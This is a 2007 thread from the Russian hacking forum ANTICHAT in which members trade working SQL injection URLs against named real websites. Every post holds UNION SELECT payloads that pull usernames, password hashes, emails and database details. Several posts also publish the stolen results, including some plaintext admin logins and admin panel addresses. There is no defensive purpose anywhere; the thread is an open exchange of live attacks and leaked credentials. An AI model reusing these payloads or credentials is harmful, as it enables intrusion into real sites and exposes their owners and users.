HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Академия онанизма и мастурбации
  #1  
Старый 07.04.2007, 00:54
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
С нами: 10225766

Репутация: 2062


По умолчанию Академия онанизма и мастурбации

Код:
http://onanistov.net/kb.php?mode=cat&cat=-3+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(username,char(58),user_password),0),0),3,4,5,66,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20phpbb_users+limit+1,1/*
Thoral:cd0d2dcda0f8df2960f53e8dd699fdab

Kamaz привет
 
Ответить с цитированием

  #2  
Старый 07.04.2007, 02:26
Thanat0z
Постоянный
Регистрация: 06.12.2006
Сообщений: 762
С нами: 10225766

Репутация: 2062


По умолчанию

Цитата:
http://www.fighterfitnessforum.com/kb.php?mode=cat&cat=2%20union%20select%201,AES_DEC RYPT(AES_ENCRYPT(concat(username,char(58),user_pas sword),0),0),3,4,5,6%20from%20phpbb_users+limit+2, 1/*
Björn:e786b2a1c90f80c0e7a674464f995b1a:grappling
Цитата:
http://www.worldwidedvdforums.com/kb.php?mode=cat&cat=-71%20union%20select%201,AES_DECRYPT(AES_ENCRYPT(co ncat(username,char(58),user_password),0),0),3,4,5, 6%20from%20phpbb_users%20limit%201,2/*
Камаз
 
Ответить с цитированием

  #3  
Старый 07.04.2007, 09:10
Fr-Ron
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
С нами: 10350730

Репутация: 337
По умолчанию

Вывод в тайтле. 5 версия, но все прямые запросы с "from" блочит. Гифровать не пробовал(

Цитата:
http://www.dosgames.ru/index.php?action=game&act=sub&id=3300+union+select +1,version(),3,4,5,6,7,8,9,10,11,12,13/*
Пасы не нашел

Цитата:
http://nfs.com.ua/file_details.phtml?id=341+union+select+1,2,3,4,5,6 ,7,name,9,10,11,12,13,14,15,16,17,18,19,20+from+me mbers+limit+1,1/*

Последний раз редактировалось Fr-Ron; 07.04.2007 в 09:35..
 
Ответить с цитированием

  #4  
Старый 07.04.2007, 10:31
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
С нами: 10160966

Репутация: 1719


По умолчанию

походу пассы в 'pass', в остальных случаях выдает ошибку..
Код:
http://nfs.com.ua/file_details.phtml?id=341+union+select+1,2,3,4,5,6,7,concat(name,0x3a,pass),9,10,11,12,13,14,15,16,17,18,19,20+from+members+limit+5,1/*
либо логин в другой, либо справа не та форма авторизации..
странно, почему у всех 'name' префикс USSRx и почему все 'pass' 4хзначные..

Последний раз редактировалось n1†R0x; 07.04.2007 в 10:35..
 
Ответить с цитированием

  #5  
Старый 07.04.2007, 13:56
Fr-Ron
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
С нами: 10350730

Репутация: 337
По умолчанию

Цитата:
Сообщение от n1†R0x  
походу пассы в 'pass', в остальных случаях выдает ошибку..
Код:
http://nfs.com.ua/file_details.phtml?id=341+union+select+1,2,3,4,5,6,7,concat(name,0x3a,pass),9,10,11,12,13,14,15,16,17,18,19,20+from+members+limit+5,1/*
либо логин в другой, либо справа не та форма авторизации..
странно, почему у всех 'name' префикс USSRx и почему все 'pass' 4хзначные..
Там вобще какая-то странная скуля =\

Цитата:
http://nfs.com.ua/forum/index.php?act=Online&st=-1
НО :

Цитата:
http://nfs.com.ua/file_details.phtml?id=341+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+ibf_m embers/*
 
Ответить с цитированием

  #6  
Старый 07.04.2007, 14:08
random
Познающий
Регистрация: 05.09.2006
Сообщений: 50
С нами: 10357689

Репутация: 250
По умолчанию

clubclass04: pillocks
Код:
http://www.glidingteam.co.uk/competitions/2006/nzgrandprix/viewnewsarticle.php?id=-184+union+select+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14,15+from+users/*
-
Код:
http://www.karmichaelhr.com/pages/viewnewsarticle.php?article=6+union+select+1,concat(database(),0x3a,version()),3,4/*

Последний раз редактировалось random; 07.04.2007 в 14:11..
 
Ответить с цитированием

  #7  
Старый 07.04.2007, 12:07
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
С нами: 10085717

Репутация: 590
По умолчанию

Код:
http://www.christymoore.com/lyrics_tabs_detail.php?id=-18%20UNION%20SELECT%201,2,table_name,4,5,6+from+INFORMATION_SCHEMA.TABLES+limit+25,1/*
http://www.christymoore.com/lyrics_tabs_detail.php?id=-18%20UNION%20SELECT%201,2,concat(username,0x3a,password),4,5,6+from+admin/*
www.christymoore.com/admin
name: christymoore
pass:cmbb
Код:
http://www.cttc.ie/memberdetails.php?id=-27+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(email,0x71),0x71),4,5,6,7,8,9,10+from+members/*
таблицы не нашел=\
 
Ответить с цитированием

  #8  
Старый 07.04.2007, 13:10
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
С нами: 10160966

Репутация: 1719


По умолчанию

таблица юзер
Код:
http://avia-model.ru/show_cat2.php?grid=-1+union+select+concat_ws(0x3a,name,username,passwd,email)+from+user/*
шоп
имя:логин:хеш:мыло
таблица админ
Код:
http://avia-model.ru/show_cat2.php?grid=-1+union+select+concat(username,0x3a,password)+from+admin/*
пароли все в mysql4
пока не расшифровал =\
 
Ответить с цитированием

  #9  
Старый 07.04.2007, 13:42
V.I.P
Познающий
Регистрация: 06.04.2007
Сообщений: 77
С нами: 10051477

Репутация: 136
По умолчанию

PHP код:
Первый скуль.    http://projectors.toshiba.com.ru/news/list/show/?newsid=-27+union+select+1,2,database(),4,concat(user(),0x3a,version()),6,7,8,9,10,11,12,   14/* 
 
Ответить с цитированием

  #10  
Старый 07.04.2007, 14:05
XTErner
Участник форума
Регистрация: 13.03.2007
Сообщений: 120
С нами: 10085717

Репутация: 590
По умолчанию

Код:
http://www.stpatsfc.com/news.php?id=-1463+union+select+1,2,3,4,concat(password,0x3a,email),6+from+members/*
http://stpatsfc.com/admin/ меня наверное глючит но на админке нету пароля))))))))
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.